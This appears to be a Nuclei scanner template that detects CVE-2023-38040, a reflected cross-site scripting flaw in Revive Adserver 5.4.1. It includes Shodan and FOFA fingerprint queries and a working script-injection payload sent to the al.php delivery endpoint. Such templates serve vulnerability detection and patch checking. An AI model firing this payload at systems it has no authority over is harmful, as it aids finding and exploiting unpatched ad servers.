id: CVE-2023-38040 info: name: Revive Adserver 5.4.1 - Cross-Site Scripting author: ritikchaddha severity: medium description: | A reflected XSS vulnerability exists in Revive Adserver 5.4.1 and earlier versions. impact: | Allows attackers to execute malicious scripts in the context of a victim's browser remediation: | Upgrade Revive Adserver to version 5.4.2 or later to mitigate the vulnerability reference: - https://hackerone.com/reports/1694171 - https://nvd.nist.gov/vuln/detail/CVE-2023-38040 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-38040 cwe-id: CWE-79 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.favicon.hash:106844876 fofa-query: icon_hash="106844876" vendor: revive-adserver product: revive_adserver tags: cve,cve2023,revive-adserver,xss flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" host-redirects: true max-redirects: 2 matchers: - type: word part: body words: - 'Revive Adserver' internal: true - method: GET path: - "{{BaseURL}}/www/delivery/al.php?zoneid=1&layerstyle=geocities&closetext=%3Cscript%3Ealert(document.domain);%3C/script%3E" matchers-condition: and matchers: - type: word part: body words: - '' - type: word part: content_type words: - text/html - type: status status: - 200 # digest: 4a0a0047304502200f40f773feb4ef1c5a7d97b15735ce5ce33acc382104b5682c012a6fc7ce0f00022100b5777414ac93558f2f33d893be28f709ed71bba7e46d4d8d7304491e08dfc521:922c64590222798bb761d5b6d8e72950